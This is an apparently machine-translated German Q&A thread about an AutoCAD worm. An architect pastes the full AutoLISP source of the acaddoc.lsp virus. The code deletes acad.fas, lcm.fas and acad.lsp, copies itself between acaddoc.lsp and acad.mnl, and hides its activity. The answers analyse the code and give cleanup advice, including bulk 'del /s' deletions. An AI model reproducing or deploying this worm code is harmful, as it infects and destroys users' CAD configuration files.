Debuggen, was das LISP-Virus zu tun

Meiner Firma getroffen wurde, durch einen AutoCAD-virus, löschen und ersetzen unsere acaddoc.lsp mit der routine unter.

Ich bin ein Architekt und nicht genau wissen was diese tun, durch das sich wiederholende "finden" und "löscht".

Fragen

  1. Was ist das ersetzen der Dateien mit (derzeit Suche nach acadapq) ?
  2. Wer schreibt einen virus für AutoCAD?!?!

Hat jemand das schon mal gesehen? die CAD-Foren, sind nicht sehr hilfreich.

(setq wold_cmd (getvar "cmdecho"))
(setvar "cmdecho" 0)
(setq bb 2)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))

(setq n 0)
(while (< n 1)
  (if (findfile "acad.fas")
      (if (vl-file-delete (findfile "acad.fas"))
          (setq n 0))
      (setq n 2)))

(setq n 0)
(while (< n 1)
  (if (findfile "lcm.fas")
      (if (vl-file-delete (findfile "lcm.fas"))
          (setq n 0))
      (setq n 2)))

(setq n 0)
(while (< n 1)
  (if (findfile "acad.lsp")
      (if (vl-file-delete (findfile "acad.lsp"))
          (setq n 0))
      (setq n 2)))

(defun wwriteapp ()
  (if (setq wwjm1 (open wnewacad "w"))
      (progn
        (setq wwjm (open woldacad "r"))
        (while (setq wwz (read-line wwjm))
          (write-line wwz wwjm1))
        (close wwjm)
        (close wwjm1))))

(setq lbz 0)
(setq wwjqm (strcat dpath "acaddoc.lsp"))
(if (setq wwjm (open wwjqm "r"))
    (progn
      (repeat 3 (read-line wwjm))
      (setq wz (read-line wwjm))
      (setq ab (atoi (substr wz 4 1)))
      (close wwjm)
      (if (> ab bb)
          (setq lbz 1))))

(setq wwjqm (strcat wpath "acad.mnl"))

(if (setq wwjm (open wwjqm "r"))
    (progn
      (repeat 3 (read-line wwjm))
      (setq wz (read-line wwjm))
      (setq nb (atoi (substr wz 4 1)))
      (close wwjm)
      (if (< nb bb)
          (setq lbz 1)))
    (setq lbz 1))
(if (= lbz 1)
    (progn
      (setq woldacad (strcat dpath "acaddoc.lsp"))
      (setq wnewacad (strcat wpath "acad.mnl"))
      (wwriteapp)))
(if (and (/= (substr dpath 1 1) (chr 67))
         (/= (substr dpath 1 1) (chr 68))
         (/= (substr dpath 1 1) (chr 69))
         (/= (substr dpath 1 1) (chr 70)))
    (progn
      (setq woldacad (strcat wpath "acad.mnl"))
      (setq wnewacad (strcat dpath "acaddoc.lsp"))
      (wwriteapp))
    (vl-file-delete (strcat dpath "acaddoc.lsp")))
;load "acadapq")
(setvar "cmdecho" wold_cmd)
  • Das ist sehr viel Programmierung verbunden. Dies sollte zu bleiben, auf Stack Overflow.
  • +1 für traurig, aber urkomisch.
  • Wie hast es installiert? Ich meine, haben Sie jemanden in Ihrer organisation installieren Sie es manuell und bewusst in den ersten Platz?
  • Ein virus geschrieben und in einem lisp-Derivat. Das ist so cool.
  • Dieser "virus" könnte man in jede Anwendung, die ein "- rc" - Datei. Es ist die Aufgabe des Betriebssystems, zu verhindern, dass die Ausbreitung von Benutzer zu Benutzer. Ohne die entsprechenden Berechtigungen, jeder konnte gehen, in, sagen wir, Ihre ~/.bashrc Datei auf einem GNU/Linux und setzen böswillige Befehle hinein.
InformationsquelleAutor | 2009-12-14
  1. 9

    Es ist eine support-Datei Weg gehen, löschen und ersetzen von den gängigen AutoCAD-Anpassung-Dateien. ("acad.fas","acad.lsp", "acaddoc.lsp") ich weiß nicht, was "lcm.fas" über alles. Ist es Teil eines AutoCAD-vertikal-Produkt ie AutoCAD mechanical oder Architectural desktop?

    Die Schleife ist im wesentlichen", während ich immer wieder auf der support-Pfad löschen".

    So weit ich weiß, AutoCAD hat keinen eingebauten Verteidigung gegen dieses. (Es kann einige acad-system var, hält die Ausführung dieser Dateien).

    Den "cmdecho" Linien sind das speichern und wiederherstellen der system-Variablen, die ermöglicht/unterdrückt die echo-Befehle. Schaltet ihn aus, während Sie ausgeführt wird (so dass Sie nicht bemerken), dann wieder die ursprüngliche Einstellung.

    Einem höflichen " virus :\

    Wenn AutoCAD gestartet wird die erste "acad.fas" & erste "acad.lsp" es findet auf ihm die Unterstützung Weg. Jedesmal, wenn AutoCAD lädt ein neues .dwg-Sie führt die "acaddoc.lsp".

    InformationsquelleAutor Rodney Schuler
  2. 1

    Als Befolgen Sie diese Schritte, um loszuwerden, diese worm:

    Manuell
    Kopieren Sie die angehängte routine auf Ihrem PC: acaddocfix_1.6.lsp

    Laden der lisp-Datei mit APPLOAD-Befehl

    Der lisp-Datei wird automatisch ausgeführt, und es wird sauber, alle Existenzen der Wurm in Ihrem support-Ordner.

    Während Ihrer ist ein anderer Weg, wir können es als eine batch-Datei, indem Sie es sobald ein Benutzer sein/Ihr PC wie ich prüfen, mit der ER vor

    Auto laufen
    Laufen Sie ein Antiviren-oder ein Reiniger, um loszuwerden, die “acaddoc.lsp-Dateien". Normalerweise cleaner-routine installiert eine einfache routine in Ihrem acad20XXdoc.lsp-Datei, die automatisch reinigen Sie diese Dateien aber ich empfehle die Reinigung der Viren mit einem anti-virus-ersten.
    Sie können auch laufen -acaddoc.bat-dos-batch-Datei zu reinigen alle Ihre Laufwerke manuell.
    Ausführen dieser batch-mal und löscht es alle acaddoc.lsp-Dateien auf Ihrem system.

    HINWEIS: Wenn eine der infizierten Dateien in Ihr Autocad Support-Ordner sind SCHREIBGESCHÜTZT die Reiniger nicht in der Lage, reinigen Sie diese Dateien !!

    wenden Sie sich an http://metinsaylan.com/how-to-clean-acaddoc-lsp-virus-from-your-pc/

    InformationsquelleAutor A.hamdan
  3. 0

    Das wilde daran ist, dass der lisp-Datei wird nur erstellt, wenn die Dateien geöffnet sind, auf das Netzwerk, lokale Kopien scheinen nicht dieses Problem haben.
    hinzufügen del /s acaddoc.lsp und "del /s" acad.lsp für alle Benutzer login-Skripte und führen Sie dies für eine Woche oder so, und Sie sollten loszuwerden, alle die acaddoc.lsp und acad.lsp-Dateien, die der virus coomes in...Stellen Sie sicher, dass Sie nicht wirklich verwenden Sie diese Dateien für Ihre eigenen Zwecke aber sind vor dem ausführen der delete-Befehl

    InformationsquelleAutor A.hamdan
Schreibe einen Kommentar